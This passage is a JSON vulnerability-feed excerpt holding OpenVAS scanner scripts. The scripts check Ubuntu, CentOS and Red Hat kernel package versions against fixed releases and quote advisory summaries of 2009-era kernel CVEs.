!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-virtual\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.27\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.27\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-virtual\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:03:06", "references": ["2010:0046", "http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html"], "pluginID": "1361412562310880643", "description": "Check for the Version of kernel", "edition": 4, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-09T00:00:00", "title": "CentOS Update for kernel CESA-2010:0046 centos5 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310880643", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880643", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0046 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, possibly, privilege escalation. (CVE-2009-3080, Important)\n \n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n \n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n \n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n \n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have "/proc/sys/fs/suid_dumpable" set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n \n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n \n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n \n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n "/sys/class/scsi_host/[a qla2xxx host]/vport_create" and "vport_delete".\n These two files were world-writable by default, allowing a local user to\n change SCSI host at ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880643\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0046\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"CentOS Update for kernel CESA-2010:0046 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:36", "references": ["2010:0046", "http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html"], "pluginID": "880643", "description": "Check for the Version of kernel", "edition": 2, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-09T00:00:00", "title": "CentOS Update for kernel CESA-2010:0046 centos5 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880643", "id": "OPENVAS:880643", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0046 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, possibly, privilege escalation. (CVE-2009-3080, Important)\n \n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n \n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n \n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n \n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have "/proc/sys/fs/suid_dumpable" set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n \n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n \n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n \n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n "/sys/class/scsi_host/[a qla2xxx host]/vport_create" and "vport_delete".\n These two files were world-writable by default, allowing a local user to\n change SCSI host at ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\");\n script_id(880643);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0046\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"CentOS Update for kernel CESA-2010:0046 centos5 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:33:00", "references": ["https://www.redhat.com/archives/rhsa-announce/2010-January/msg00013.html", "2010:0046-01"], "pluginID": "870210", "description": "Check for the Version of kernel", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-20T00:00:00", "title": "RedHat Update for kernel RHSA-2010:0046-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2017-12-21T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870210", "id": "OPENVAS:870210", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0046-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, 